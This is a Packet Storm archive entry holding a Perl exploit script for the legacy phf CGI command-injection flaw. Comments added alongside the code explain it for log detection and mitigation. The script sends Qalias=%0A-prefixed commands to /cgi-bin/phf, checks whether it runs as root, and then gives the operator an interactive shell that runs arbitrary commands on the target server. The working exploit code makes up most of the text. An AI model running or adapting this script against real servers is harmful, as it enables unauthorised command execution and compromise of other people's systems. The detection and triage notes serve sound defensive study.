New Twist On The Old PHF Vulnerability

2008-12-30T00:00:00
ID PACKETSTORM:73320
Type packetstorm
Reporter Oxagast
Modified 2008-12-30T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
# greets to josh arielle matt carley  
  
# NOTE(review): defensive reading of this listing, for log analysis and triage.
#
# The script drives the historical "phf" sample CGI at /cgi-bin/phf on the
# host named in $ARGV[0]. Every request it sends has the same shape: a GET
# whose Qalias parameter begins with %0A (a URL-encoded newline) followed by
# a command line. It then treats the text after the <PRE> line of the
# response as that command's output, i.e. it relies on the server-side
# program passing the text after the newline to a shell.
#
# Detection: in web server access logs, look for requests to /cgi-bin/phf
# whose query string contains Qalias=%0A (match the hex digits
# case-insensitively). The probes below are fixed and arrive in this order:
# "uname -a", "sh --version", "ls  /bin", then "id".
#
# Mitigation: remove phf (and any other sample CGI programs) from cgi-bin;
# a server that does not have the program cannot be driven this way.
#
# There is no "use strict" / "use warnings": every variable below is an
# undeclared package global, and out-of-range array reads are silent.
use WWW::Mechanize;  
# With no hostname argument, print the banner and usage text and stop.
if (scalar(@ARGV) < 1) {  
print "\n --=== PHF00z3 by Oxagast ===--\n\n";  
print " useage: ./$0 hostname\n\n";  
print " Play Nice :)\n";  
exit();  
}  
# HTTP client with a 3-second timeout; reused for every request.
$scrape = WWW::Mechanize->new(timeout => 3);  
# These two messages are printed before any request has been sent.
print "Connecting...\n";  
print "Checking if exploitable...\n";  
# Probe 1: "uname -a". The line following the one containing <PRE> is kept
# in $realunamea and shown later in the banner.
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Auname%20-a");  
$unamea = $scrape->content();  
@unameafeed = split(/\n/, $unamea);  
# 0..scalar(@array) runs one index past the last element; that extra
# element is undef and simply fails the match.
for $stupidpres (0..scalar(@unameafeed)) {  
if (@unameafeed[$stupidpres] =~ m/<PRE>/) {  
$realunamea = @unameafeed[$stupidpres+1];  
}  
}  
# Probe 2: "sh --version". Used only to build the prompt label
# "sh-<major.minor>" in $realshver; if the version pattern captures
# nothing, $realshver stays unset and the prompt is printed without it.
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Ash%20--version");  
$shver = $scrape->content();  
@shverfeed = split(/\n/, $shver);  
for $stupidpres (0..scalar(@shverfeed)) {  
if (@shverfeed[$stupidpres] =~ m/<PRE>/) {  
@shverfeed[$stupidpres+1] =~ m/version (\d+\.\d)/;  
if ($1 ne "") {  
$realshver = "sh-$1";  
}  
}  
}  
# Probe 3: "ls  /bin". The target is treated as responsive only if the
# response text contains all three of "chmod", "mkdir" and "stty".
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Als%20%20/bin");  
$scraped = $scrape->content();  
if($scraped =~ /chmod/m) {  
if($scraped =~ /mkdir/m) {  
if($scraped =~ /stty/m) {  
# $startup marks the first pass of the loop; $rootus selects "#" vs "$"
# as the prompt character.
$startup = 1;  
$rootus = 0;  
# The condition is always true: the loop has no exit path of its own and
# ends only when the process is stopped or a call dies.
while (0 < 1) {  
# First pass: the command is fixed to "id".
if ($startup == 1) {  
$cmd = "id";  
  
}  
# Later passes: print the prompt and read one line from the operator.
if ($startup == 0) {  
if ($rootus == 0) {  
print "$realshver\$ ";  
}  
if ($rootus == 1) {  
print "$realshver\# ";  
}  
$cmd = <STDIN>;  
}  
# One GET per command, same URL shape as the probes. $cmd is interpolated
# as typed (any escaping is left to the HTTP library), so the command text
# should be recoverable from the query string in access logs -- verify
# against the server's log format.
$scrape->get("http:\/\/@ARGV[0]/cgi-bin/phf?Qalias=%0A$cmd");  
$scraped = $scrape->content();  
@feedback = split(/\n/, $scraped);  
# Find the output start. Unlike the probes above, this requires a line
# that is exactly "<PRE>". $outs is a global, so if no such line is found
# the value from the previous pass is reused.
for $line (0..scalar(@feedback)) {  
if (@feedback[$line] eq "<PRE>") {  
$outs = $line + 1;  
}  
}  
# Print from the line after <PRE> up to the second-to-last line; the final
# line is skipped (presumably closing markup -- not confirmed by this
# listing).
for $outline ($outs..scalar(@feedback)-2) {  
if ($startup == 1) {  
# On the first pass, "(root)" in the "id" output switches the prompt to "#".
if (@feedback[$outline] =~ /\(root\)/) {  
print "OOooooo now look what we have here... :P r00t\n";  
print "$realunamea\n";  
$rootus = 1;  
}  
else {  
print "We got ourselves a shell... :)\n";  
print "$realunamea\n";  
}  
}  
print "@feedback[$outline]\n";  
# $startup is cleared only here, inside the output loop: if the first
# response yields no lines to print, the next pass sends "id" again.
$startup = 0;  
}  
}  
}  
}  
}  
  
# This else pairs with the outermost test (/chmod/) only. If "chmod" is
# present but "mkdir" or "stty" is not, the script ends without printing
# anything, so silence here does not indicate either outcome.
else {  
print "OOps, doesn't look like she's vulnerable. :(\n";  
}  
`